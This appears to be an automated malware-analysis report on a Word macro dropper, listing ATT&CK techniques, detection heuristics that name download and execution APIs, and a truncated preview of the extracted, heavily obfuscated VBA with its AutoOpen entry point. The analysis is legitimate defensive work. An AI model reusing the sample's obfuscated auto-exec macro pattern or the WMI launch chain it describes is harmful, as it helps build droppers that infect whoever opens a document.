MALICIOUS
342
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains a critical heuristic firing for VBA WMI Win32_Process launcher, indicating the use of Visual Basic for Applications to execute commands via WMI. The presence of an AutoOpen macro and split keyword obfuscation further supports this. The script's intent is to leverage WMI to create a process, likely to download and execute a second-stage payload.
Heuristics 9
-
ClamAV: Doc.Dropper.Agent-6966214-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6966214-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 43022 bytes |
SHA-256: e12fb608bc143b8ad92b0e67effe601ac2b3c41d4fb766edfbd2fecf5887b39b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "B6108955"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "F15429"
Attribute VB_Base = "0{F7AEC335-83AB-407F-BE00-CC619A70DC49}{CD4CF7E8-CE66-4EF7-A1BA-E559BB585E7E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "F3_952"
Attribute VB_Name = "J0536822"
Attribute VB_Name = "N7788748"
Attribute VB_Name = "Z27_83"
Attribute VB_Name = "s9203027"
Attribute VB_Name = "b52_6831"
Attribute VB_Name = "Q825387"
Attribute VB_Name = "i3_6595"
Attribute VB_Name = "q6_83_"
Attribute VB_Base = "0{31E9B1DF-5E8A-4D2E-93FE-DC6493918584}{366CD540-B076-4538-AC65-03CCE723149F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "j21_30"
Function c81166_(o30396)
While G7229771 And O137677
Select Case w8_162_8
Case n64__341
B3680669 = Log(c435613)
z0_6250 = 980366862
T36910 = Int(N3_823 + CLng(U406_19))
Case u2943_65
H17279 = L8488901
d45520 = Cos(153269693)
q1463827 = CStr(330858079)
End Select
Wend
While B128743 And B_071_50
Select Case E60910
Case d1313459
G9184_ = Log(G6461_09)
I319678_ = 642431198
f2483993 = Int(t62976 + CLng(P26357_2))
Case b_5443
z902268 = n_1017
q359981 = Cos(478042632)
W9630337 = CStr(251490308)
End Select
Wend
Set c81166_ = CVar(o30396)
While b8359_1 And k9469816
Select Case J939291
Case l95266
f0441981 = Log(G752_062)
v18899 = 808506213
d910_5 = Int(O2_791 + CLng(j9707758))
Case d2863_89
F86848 = u8218021
n_5532 = Cos(884622483)
m0_0_6_ = CStr(781093032)
End Select
Wend
While G54560 And l0349_
Select Case P24017
Case f542841_
V860278 = Log(N_1716)
N77166 = 354024360
c66504 = Int(d875183 + CLng(i_60474))
Case T04_2221
O85833 = o03059_0
M3_242 = Cos(938899852)
i763_8 = CStr(59754062)
End Select
Wend
While o0492618 And a4_218
Select Case z69525
Case I861905
j892_4 = Log(I2_4097_)
Z_580274 = 375098906
V8021514 = Int(K65138 + CLng(s_16__))
Case z9877_2
a2395683 = a18765
M8_8_45 = Cos(394165218)
Y644239 = CStr(594074891)
End Select
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While r6_73526 And P429_88
Select Case a17584
Case F_73156_
W833845 = Log(W887_5)
s41347 = 666925634
h530895 = Int(N_4431 + CLng(G15470))
Case f86522
H8_139 = d821_71
F6873173 = Cos(739516046)
t82251 = CStr(162195872)
End Select
Wend
While r98693 And U9448252
Select Case Q16756_
Case A055252
n75416 = Log(w35410)
K68342 = 615491629
c1143065 = Int(P2__103 + CLng(M1__240))
Case Y_7_366
o840__6_ = a8417_
j2_14___ = Cos(211022618)
u56636 = CStr(859381382)
End Select
Wend
Call P255599
While c4646973 And S9964348
Select Case u803799
Case o52490
d6_29_7 = Log(A7371070)
V4881110 = 278893779
B7_7933 = Int(i38992 + CLng(o7658__))
Case o028
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.